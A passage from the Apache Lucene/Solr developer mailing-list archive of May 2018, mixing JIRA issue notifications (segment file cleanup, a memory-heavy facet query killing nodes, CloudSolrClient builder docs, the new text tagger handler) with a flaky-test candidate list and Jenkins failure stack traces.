org.apache.lucene.util.TestRuleStoreClassName$1.evaluate(TestRuleStoreClassName.java:41)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleAssertionsRequired$1.evaluate(TestRuleAssertionsRequired.java:53)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleIgnoreTestSuites$1.evaluate(TestRuleIgnoreTestSuites.java:54)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$StatementRunner.run(ThreadLeakControl.java:368)
at java.lang.Thread.run(Thread.java:748)


FAILED:  
org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testSplitIntegration

Error Message:
last state: 
DocCollection(testSplitIntegr

[jira] [Commented] (LUCENE-8324) Unreferenced files of dropped segments should be released

2018-05-21 Thread Michael McCandless (JIRA)

[ 
https://issues.apache.org/jira/browse/LUCENE-8324?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482797#comment-16482797
 ] 

Michael McCandless commented on LUCENE-8324:


+1

> Unreferenced files of dropped segments should be released
> -
>
> Key: LUCENE-8324
> URL: https://issues.apache.org/jira/browse/LUCENE-8324
> Project: Lucene - Core
>  Issue Type: Bug
>  Components: core/index
>Affects Versions: 7.4, master (8.0)
>Reporter: Nhat Nguyen
>Priority: Major
> Attachments: LUCENE-8324.patch, release-files.patch
>
>
> {quote} This has the side-effect that flushed segments that are 100% hard 
> deleted are also
> cleaned up right after they are flushed, previously these segments were 
> sticking
> around for a while until they got picked for a merge or received another 
> delete.{quote}
>  
> Since LUCENE-8253, a fully deleted segment is dropped immediately when it's 
> flushed, however, its files might be kept around even after a commit. In 
> other words, we may have unreferenced files which are retained by Deleter.
> I am not entirely sure if we should fix this but it's nice to have a 
> consistent content between current files and commit points as before.
> I attached a failed test for this.
> /cc [~simonw]



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Resolved] (SOLR-12381) facet query causes down replicas

2018-05-21 Thread Mikhail Khludnev (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12381?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Mikhail Khludnev resolved SOLR-12381.
-
Resolution: Won't Fix

Max heap size should be set below oom_killer boundary, in this case Solr might 
have a chance to respond with OOME, and starting from 7.3 Solr survive after 
that. 
Anyway, for -the sane- regular cases the suggestion is to use docValues, but 
giving the name of the field, it's not an  option. 

> facet query causes down replicas
> 
>
> Key: SOLR-12381
> URL: https://issues.apache.org/jira/browse/SOLR-12381
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Affects Versions: 6.6.1
>Reporter: kiarash
>Priority: Major
>
> Cluster description:
> I have a solr cluster with 3 nodes(node1, node2, node3).
> Each node has:
> 30 GB memory.
> 3 TB SATA Disk
> My cluster involves 5 collections which contain more than a billion document.
> I have a collection(news_archive collection) which contain 30 million 
> document. This collection is divided into 3 shards which each of them 
> contains 10 million document and occupies 100GB on the Disk. Each of the 
> shards has 3 replicas.
> Each of the cluster nodes contains one of the replicas of each shard. in 
> fact, the nodes are similar, i.e:
> node1 contains:
> shard1_replica1
> shard2_replica1
> shard3_replica1
> node2 contains:
> shard1_replica2
> shard2_replica2
> shard3_replica2
> node3 contains:
> shard1_replica3
> shard2_replica3
> shard3_replica3
> Problem description:
> when I run a heavy facet query, 
> such as 
> http://Node1IP:/solr/news_archive/select?q=*:*&fq=pubDate:[2018-1-18T12:06:57Z%20TO%202018-4-18T12:06:57Z]&facet.field=ngram_content&facet=true&facet.mincount=1&facet.limit=2000&rows=0&wt=json,
>  the solr instances are killed by the OOM killer in almost all of the nodes.
> I found the bellow log in 
> solr/logs/solr_oom_killer--2018-05-21_19_17_41.log in each of the solr 
> instances,
> "Running OOM killer script for process 2766 for Solr on port 
> Killed process 2766"
> It seems that the query is routed into different nodes of the clusters and 
> with attention to exhaustively use of memory which is caused by the query the 
> solr instances are killed by OOM Killer.
>  
> despite the fact that how the query is memory demanding, I think the 
> cluster's nodes should be preserved from being killed by any read query.
> for example by limiting the amount of memory which can be used by any query.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-12309) CloudSolrClient.Builder constructors are not well documented

2018-05-21 Thread Jason Gerlowski (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12309?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482726#comment-16482726
 ] 

Jason Gerlowski commented on SOLR-12309:


Hmm, it's an interesting idea.  And I appreciate your humoring me in getting 
back the compile-time guidance/errors.  I guess I'm just stuck understanding 
your underlying motivation for wanting to get the no-arg ctors back.  I can see 
few reasons that'd make sense, I'm just wondering which ones you're interested 
in, and how this patch helps them.

Is your concern a slippery-slope explosion of ctors if SolrJ gains some more 
required arguments in the future?  Is your goal to make the Builder more 
fluent, and you see eliminating ctor arguments as a step towards that?  Or do 
you think this is more intuitive from an end-user perspective than the 
currently committed ctors/approach?  Or is there some other motivation?

You patch does regain a no-arg ctor of sorts, but the next method call MUST be 
to provide the zk-host/url-list- you can't call setters in whatever order you 
please.  IMO that undercuts any gains in "fluent"-ness and leaves things 
looking oddly similar to the interface/ctors we have currently. 

Maybe you prefer this approach because of it prevents a potential ctor 
explosion if other SolrClient arguments become required.  But I'm not sure 
whether it prevents the explosion, or just shuffles the "bomb" around to other 
types (tiny Builder implementations).

I guess at this point my vote is still to improve the Javadocs and other 
documentation around this, rather than reworking the interface.  But I'm happy 
to be overruled or have my misconceptions corrected.  I'll unassign myself in 
case you want to pursue a non-documentation solution.  I'll still work on 
Javadocs independently- they'll be useful for devs in the interim even if we 
end up changing the interface going forward.

> CloudSolrClient.Builder constructors are not well documented
> 
>
> Key: SOLR-12309
> URL: https://issues.apache.org/jira/browse/SOLR-12309
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>  Components: clients - java
>Affects Versions: 7.3
>Reporter: Shawn Heisey
>Assignee: Jason Gerlowski
>Priority: Minor
> Attachments: fluent-builder-fail-compile-time.patch
>
>
> I was having a lot of trouble figuring out how to create a CloudSolrClient 
> object without using deprecated code.
> The no-arg constructor on the Builder object is deprecated, and the two 
> remaining methods have similar signatures to each other.  It is not at all 
> obvious how to successfully call the one that uses ZooKeeper to connect.  The 
> javadoc is silent on the issue.  I did finally figure it out with a lot of 
> googling, and I would like to save others the hassle.
> I believe that this is what the javadoc for the third ctor should say:
> 
> Provide a series of ZooKeeper hosts which will be used when configuring 
> CloudSolrClient instances.  Optionally, include a chroot to be used when 
> accessing the ZooKeeper database.
> Here are a couple of examples.  The first one has no chroot, the second one 
> does:
> new CloudSolrClient.Builder(zkHosts, Optional.empty())
> new CloudSolrClient.Builder(zkHosts, Optional.of("/solr"))
> 
> The javadoc for the URL-based method should probably say something to 
> indicate that it is easy to confuse with the ZK-based method.
> I have not yet looked at the current reference guide to see if that has any 
> clarification.
> Is it a good idea to completely eliminate the ability to create a cloud 
> client using a single string that matches the zkHost value used when starting 
> Solr in cloud mode?



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Assigned] (SOLR-12309) CloudSolrClient.Builder constructors are not well documented

2018-05-21 Thread Jason Gerlowski (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12309?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Jason Gerlowski reassigned SOLR-12309:
--

Assignee: (was: Jason Gerlowski)

> CloudSolrClient.Builder constructors are not well documented
> 
>
> Key: SOLR-12309
> URL: https://issues.apache.org/jira/browse/SOLR-12309
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>  Components: clients - java
>Affects Versions: 7.3
>Reporter: Shawn Heisey
>Priority: Minor
> Attachments: fluent-builder-fail-compile-time.patch
>
>
> I was having a lot of trouble figuring out how to create a CloudSolrClient 
> object without using deprecated code.
> The no-arg constructor on the Builder object is deprecated, and the two 
> remaining methods have similar signatures to each other.  It is not at all 
> obvious how to successfully call the one that uses ZooKeeper to connect.  The 
> javadoc is silent on the issue.  I did finally figure it out with a lot of 
> googling, and I would like to save others the hassle.
> I believe that this is what the javadoc for the third ctor should say:
> 
> Provide a series of ZooKeeper hosts which will be used when configuring 
> CloudSolrClient instances.  Optionally, include a chroot to be used when 
> accessing the ZooKeeper database.
> Here are a couple of examples.  The first one has no chroot, the second one 
> does:
> new CloudSolrClient.Builder(zkHosts, Optional.empty())
> new CloudSolrClient.Builder(zkHosts, Optional.of("/solr"))
> 
> The javadoc for the URL-based method should probably say something to 
> indicate that it is easy to confuse with the ZK-based method.
> I have not yet looked at the current reference guide to see if that has any 
> clarification.
> Is it a good idea to completely eliminate the ability to create a cloud 
> client using a single string that matches the zkHost value used when starting 
> Solr in cloud mode?



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Created] (SOLR-12381) facet query causes down replicas

2018-05-21 Thread kiarash (JIRA)
kiarash created SOLR-12381:
--

 Summary: facet query causes down replicas
 Key: SOLR-12381
 URL: https://issues.apache.org/jira/browse/SOLR-12381
 Project: Solr
  Issue Type: Bug
  Security Level: Public (Default Security Level. Issues are Public)
Affects Versions: 6.6.1
Reporter: kiarash


Cluster description:


I have a solr cluster with 3 nodes(node1, node2, node3).

Each node has:
30 GB memory.
3 TB SATA Disk

My cluster involves 5 collections which contain more than a billion document.

I have a collection(news_archive collection) which contain 30 million document. 
This collection is divided into 3 shards which each of them contains 10 million 
document and occupies 100GB on the Disk. Each of the shards has 3 replicas.

Each of the cluster nodes contains one of the replicas of each shard. in fact, 
the nodes are similar, i.e:

node1 contains:
shard1_replica1
shard2_replica1
shard3_replica1
node2 contains:
shard1_replica2
shard2_replica2
shard3_replica2
node3 contains:
shard1_replica3
shard2_replica3
shard3_replica3

Problem description:


when I run a heavy facet query, 
such as 
http://Node1IP:/solr/news_archive/select?q=*:*&fq=pubDate:[2018-1-18T12:06:57Z%20TO%202018-4-18T12:06:57Z]&facet.field=ngram_content&facet=true&facet.mincount=1&facet.limit=2000&rows=0&wt=json,
 the solr instances are killed by the OOM killer in almost all of the nodes.
I found the bellow log in 
solr/logs/solr_oom_killer--2018-05-21_19_17_41.log in each of the solr 
instances,

"Running OOM killer script for process 2766 for Solr on port 
Killed process 2766"


It seems that the query is routed into different nodes of the clusters and with 
attention to exhaustively use of memory which is caused by the query the solr 
instances are killed by OOM Killer.

 

despite the fact that how the query is memory demanding, I think the cluster's 
nodes should be preserved from being killed by any read query.

for example by limiting the amount of memory which can be used by any query.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



Re: BadApple candidates

2018-05-21 Thread Alan Woodward
When did TestLRUQueryCache fail?  I haven’t seen that one.

> On 21 May 2018, at 16:00, Erick Erickson  wrote:
> 
> I'm going to change how I collect the badapple candidates. After
> getting a little
> overwhelmed by the number of failure e-mails (even ignoring the ones with
> BadApple enabled), "It come to me in a vision! In a flash!"" (points if you
> know where that comes from, hint: Old music involving a pickle).
> 
> Since I collect failures for a week then run filter them by what's
> also in Hoss's
> results from two  weeks ago, that's really equivalent to creating the 
> candidate
> list from the intersection of the most recent week of Hoss's results and the
> results from _three_ weeks ago. Much faster too. Thanks Hoss!
> 
> So that's what I'll do going forward.
> 
> Meanwhile, here's the list for this Thursday.
> 
> BadApple candidates: I'll BadApple these on Thursday unless there are 
> objections
> org.apache.lucene.search.TestLRUQueryCache.testBulkScorerLocking
>  org.apache.solr.TestDistributedSearch.test
>  org.apache.solr.cloud.AddReplicaTest.test
>  org.apache.solr.cloud.AssignBackwardCompatibilityTest.test
>  org.apache.solr.cloud.CreateRoutedAliasTest.testCollectionNamesMustBeAbsent
>  org.apache.solr.cloud.CreateRoutedAliasTest.testTimezoneAbsoluteDate
>  org.apache.solr.cloud.CreateRoutedAliasTest.testV1
>  org.apache.solr.cloud.CreateRoutedAliasTest.testV2
>  
> org.apache.solr.cloud.DeleteReplicaTest.raceConditionOnDeleteAndRegisterReplica
>  org.apache.solr.cloud.LIRRollingUpdatesTest.testNewReplicaOldLeader
>  org.apache.solr.cloud.LeaderVoteWaitTimeoutTest.basicTest
>  
> org.apache.solr.cloud.LeaderVoteWaitTimeoutTest.testMostInSyncReplicasCanWinElection
>  org.apache.solr.cloud.MoveReplicaHDFSTest.testFailedMove
>  org.apache.solr.cloud.RestartWhileUpdatingTest.test
>  
> org.apache.solr.cloud.TestCloudConsistency.testOutOfSyncReplicasCannotBecomeLeader
>  org.apache.solr.cloud.TestPullReplica.testCreateDelete
>  org.apache.solr.cloud.TestPullReplica.testKillLeader
>  org.apache.solr.cloud.TestSolrCloudWithKerberosAlt.testBasics
>  org.apache.solr.cloud.UnloadDistributedZkTest.test
>  
> org.apache.solr.cloud.api.collections.CollectionsAPIAsyncDistributedZkTest.testAsyncRequests
>  
> org.apache.solr.cloud.api.collections.CustomCollectionTest.testCustomCollectionsAPI
>  org.apache.solr.cloud.autoscaling.ComputePlanActionTest.testNodeLost
>  org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testMergeIntegration
>  org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testSplitIntegration
>  org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testTrigger
>  org.apache.solr.cloud.autoscaling.NodeAddedTriggerTest.testRestoreState
>  
> org.apache.solr.cloud.autoscaling.SearchRateTriggerIntegrationTest.testBelowSearchRate
>  
> org.apache.solr.cloud.autoscaling.SearchRateTriggerIntegrationTest.testDeleteNode
>  org.apache.solr.cloud.autoscaling.SearchRateTriggerTest.testTrigger
>  org.apache.solr.cloud.hdfs.HdfsUnloadDistributedZkTest.test
>  org.apache.solr.cloud.hdfs.StressHdfsTest.test
>  org.apache.solr.handler.TestSQLHandler.doTest
>  org.apache.solr.security.BasicAuthIntegrationTest.testBasicAuth
>  org.apache.solr.uninverting.TestDocTermOrds.testTriggerUnInvertLimit
>  org.apache.solr.update.TestHdfsUpdateLog.testFSThreadSafety
>  org.apache.solr.update.TestInPlaceUpdatesDistrib.test
> 
> 
> Number of AwaitsFix: 21 Number of BadApples: 99
> 
> *AwaitsFix Annotations:
> 
> 
> Lucene AwaitsFix
> GeoPolygonTest.java
>  testLUCENE8276_case3()
>  //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8276";)
> 
> GeoPolygonTest.java
>  testLUCENE8280()
>  //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8280";)
> 
> GeoPolygonTest.java
>  testLUCENE8281()
>  //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8281";)
> 
> RandomGeoPolygonTest.java
>  testCompareBigPolygons()
>  //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8281";)
> 
> RandomGeoPolygonTest.java
>  testCompareSmallPolygons()
>  //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8281";)
> 
> TestControlledRealTimeReopenThread.java
>  testCRTReopen()
>  @AwaitsFix(bugUrl = "https://issues.apache.org/jira/browse/LUCENE-5737";)
> 
> TestICUNormalizer2CharFilter.java
>  testRandomStrings()
>  @AwaitsFix(bugUrl = "https://issues.apache.org/jira/browse/LUCENE-5595";)
> 
> TestICUTokenizerCJK.java
>  TestICUTokenizerCJK suite
>  @AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8222";)
> 
> TestMoreLikeThis.java
>  testMultiFieldShouldReturnPerFieldBooleanQuery()
>  @AwaitsFix(bugUrl = "https://issues.apache.org/jira/browse/LUCENE-7161";)
> 
> UIMABaseAnalyzerTest.java
>  testRandomStrings()
>  @Test @AwaitsFix(bugUrl =
> "https://issues.apache.org/jira/browse/LUCENE-3869";)
> 
> UIMABaseAnalyzerTest.java
>  testRandomStringsWithConfigurationParameters()
>  @Test @AwaitsFix(bugUrl =
> "https://issue

[jira] [Commented] (SOLR-9480) Graph Traversal for Significantly Related Terms (Semantic Knowledge Graph)

2018-05-21 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-9480?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482696#comment-16482696
 ] 

ASF subversion and git services commented on SOLR-9480:
---

Commit f0d6a0e638b13ddf4f5acfffdcd390e977572b67 in lucene-solr's branch 
refs/heads/branch_7x from Chris Hostetter
[ https://git-wip-us.apache.org/repos/asf?p=lucene-solr.git;h=f0d6a0e ]

SOLR-9480: A new 'relatedness()' aggregate function for JSON Faceting to enable 
building Semantic Knowledge Graphs

(cherry picked from commit 669b9e7a5343c625e265a075c9dbf24fcbff7363)


> Graph Traversal for Significantly Related Terms (Semantic Knowledge Graph)
> --
>
> Key: SOLR-9480
> URL: https://issues.apache.org/jira/browse/SOLR-9480
> Project: Solr
>  Issue Type: Improvement
>  Security Level: Public(Default Security Level. Issues are Public) 
>Reporter: Trey Grainger
>Assignee: Hoss Man
>Priority: Major
> Attachments: SOLR-9480.patch, SOLR-9480.patch, SOLR-9480.patch, 
> SOLR-9480.patch, SOLR-9480.patch, SOLR-9480.patch
>
>
> This issue is to track the contribution of the Semantic Knowledge Graph Solr 
> Plugin (request handler), which exposes a graph-like interface for 
> discovering and traversing significant relationships between entities within 
> an inverted index.
> This data model has been described in the following research paper: [The 
> Semantic Knowledge Graph: A compact, auto-generated model for real-time 
> traversal and ranking of any relationship within a 
> domain|https://arxiv.org/abs/1609.00464], as well as in presentations I gave 
> in October 2015 at [Lucene/Solr 
> Revolution|http://www.slideshare.net/treygrainger/leveraging-lucenesolr-as-a-knowledge-graph-and-intent-engine]
>  and November 2015 at the [Bay Area Search 
> Meetup|http://www.treygrainger.com/posts/presentations/searching-on-intent-knowledge-graphs-personalization-and-contextual-disambiguation/].
> The source code for this project is currently available at 
> [https://github.com/careerbuilder/semantic-knowledge-graph], and the folks at 
> CareerBuilder (where this was built) have given me the go-ahead to now 
> contribute this back to the Apache Solr Project, as well.
> Check out the Github repository, research paper, or presentations for a more 
> detailed description of this contribution. Initial patch coming soon.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-12376) New TaggerRequestHandler (aka SolrTextTagger)

2018-05-21 Thread David Smiley (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12376?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482693#comment-16482693
 ] 

David Smiley commented on SOLR-12376:
-

Updated patch that passes precommit; there were some little things addressed 
with this.

TODO docs.

> New TaggerRequestHandler (aka SolrTextTagger)
> -
>
> Key: SOLR-12376
> URL: https://issues.apache.org/jira/browse/SOLR-12376
> Project: Solr
>  Issue Type: New Feature
>  Security Level: Public(Default Security Level. Issues are Public) 
>Reporter: David Smiley
>Assignee: David Smiley
>Priority: Major
> Fix For: 7.4
>
> Attachments: SOLR-12376.patch, SOLR-12376.patch
>
>
> This issue introduces a new RequestHandler: {{TaggerRequestHandler}}, AKA the 
> SolrTextTagger from the OpenSextant project 
> [https://github.com/OpenSextant/SolrTextTagger]. It's used for named entity 
> recognition (NER) of text past to it. It doesn't do any NLP (outside of 
> Lucene text analysis) so it's said to be a "naive tagger", but it's 
> definitely useful as-is and a more complete NER or ERD (entity recognition 
> and disambiguation) system can be built with this as a key component. The 
> SolrTextTagger has been used on queries for query-understanding, and it's 
> been used on full-text, and it's been used on dictionaries that number tens 
> of millions in size. Since it's small and has been used a bunch (including 
> helping win an ERD competition and in [Apache 
> Stanbol|https://stanbol.apache.org/]), several people have asked me when or 
> why isn't this in Solr yet. So here it is.
> To use it, first you need a collection of documents that have a name-like 
> field (short text) indexed with the ConcatenateFilter (LUCENE-8323) at the 
> end. We call this the dictionary. Once that's in place, you simply post text 
> to a {{TaggerRequestHandler}} and it returns the offset pairs into that text 
> for matches in the dictionary along with the uniqueKey of the matching 
> documents. It can also return other document data desired. That's the gist; 
> I'll add more details on use to the Solr Reference Guide.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Updated] (SOLR-12376) New TaggerRequestHandler (aka SolrTextTagger)

2018-05-21 Thread David Smiley (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12376?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

David Smiley updated SOLR-12376:

Attachment: SOLR-12376.patch

> New TaggerRequestHandler (aka SolrTextTagger)
> -
>
> Key: SOLR-12376
> URL: https://issues.apache.org/jira/browse/SOLR-12376
> Project: Solr
>  Issue Type: New Feature
>  Security Level: Public(Default Security Level. Issues are Public) 
>Reporter: David Smiley
>Assignee: David Smiley
>Priority: Major
> Fix For: 7.4
>
> Attachments: SOLR-12376.patch, SOLR-12376.patch
>
>
> This issue introduces a new RequestHandler: {{TaggerRequestHandler}}, AKA the 
> SolrTextTagger from the OpenSextant project 
> [https://github.com/OpenSextant/SolrTextTagger]. It's used for named entity 
> recognition (NER) of text past to it. It doesn't do any NLP (outside of 
> Lucene text analysis) so it's said to be a "naive tagger", but it's 
> definitely useful as-is and a more complete NER or ERD (entity recognition 
> and disambiguation) system can be built with this as a key component. The 
> SolrTextTagger has been used on queries for query-understanding, and it's 
> been used on full-text, and it's been used on dictionaries that number tens 
> of millions in size. Since it's small and has been used a bunch (including 
> helping win an ERD competition and in [Apache 
> Stanbol|https://stanbol.apache.org/]), several people have asked me when or 
> why isn't this in Solr yet. So here it is.
> To use it, first you need a collection of documents that have a name-like 
> field (short text) indexed with the ConcatenateFilter (LUCENE-8323) at the 
> end. We call this the dictionary. Once that's in place, you simply post text 
> to a {{TaggerRequestHandler}} and it returns the offset pairs into that text 
> for matches in the dictionary along with the uniqueKey of the matching 
> documents. It can also return other document data desired. That's the gist; 
> I'll add more details on use to the Solr Reference Guide.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[JENKINS] Lucene-Solr-master-Solaris (64bit/jdk1.8.0) - Build # 1882 - Still Unstable!

2018-05-21 Thread Policeman Jenkins Server
Build: https://jenkins.thetaphi.de/job/Lucene-Solr-master-Solaris/1882/
Java: 64bit/jdk1.8.0 -XX:+UseCompressedOops -XX:+UseG1GC

7 tests failed.
FAILED:  org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testTrigger

Error Message:
should have fired an event

Stack Trace:
java.lang.AssertionError: should have fired an event
at 
__randomizedtesting.SeedInfo.seed([24783940B4488C36:47B30FC22D87FF1B]:0)
at org.junit.Assert.fail(Assert.java:93)
at org.junit.Assert.assertTrue(Assert.java:43)
at org.junit.Assert.assertNotNull(Assert.java:526)
at 
org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testTrigger(IndexSizeTriggerTest.java:184)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at 
sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at 
sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.invoke(RandomizedRunner.java:1737)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$8.evaluate(RandomizedRunner.java:934)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$9.evaluate(RandomizedRunner.java:970)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$10.evaluate(RandomizedRunner.java:984)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.TestRuleSetupTeardownChained$1.evaluate(TestRuleSetupTeardownChained.java:49)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
org.apache.lucene.util.TestRuleThreadAndTestName$1.evaluate(TestRuleThreadAndTestName.java:48)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$StatementRunner.run(ThreadLeakControl.java:368)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl.forkTimeoutingTask(ThreadLeakControl.java:817)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$3.evaluate(ThreadLeakControl.java:468)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.runSingleTest(RandomizedRunner.java:943)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$5.evaluate(RandomizedRunner.java:829)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$6.evaluate(RandomizedRunner.java:879)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$7.evaluate(RandomizedRunner.java:890)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleStoreClassName$1.evaluate(TestRuleStoreClassName.java:41)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleAssertionsRequired$1.evaluate(TestRuleAssertionsRequired.java:53)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleIgnoreTestSuites$1.evaluate(TestRuleIgnoreTestSuites.java:54)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$StatementRunner.run(ThreadLeakControl.java:368)
at java.lang.Thread.run(Thread.java:748)


FAILED:  org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testTrigger

Error Message:
should have fired an event

Stack Trace:
java.lang.AssertionError: should have fired an event
at 
__randomizedtesting.SeedInfo.seed(

[jira] [Created] (SOLR-12380) Support CDCR operation in the implicit routing mode cluster

2018-05-21 Thread Atita Arora (JIRA)
Atita Arora created SOLR-12380:
--

 Summary: Support CDCR operation in the implicit routing mode 
cluster
 Key: SOLR-12380
 URL: https://issues.apache.org/jira/browse/SOLR-12380
 Project: Solr
  Issue Type: Bug
  Security Level: Public (Default Security Level. Issues are Public)
  Components: CDCR
Reporter: Atita Arora
 Attachments: Gmail - CDCR setup with Custom Document Routing.pdf

Would like to explore to see if we can fix CDC replication in the custom 
document / implicit routing mode cluster.

 

Attaching mail for reference.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (LUCENE-8319) A Time-limiting collector that works with CollectorManagers

2018-05-21 Thread Michael McCandless (JIRA)

[ 
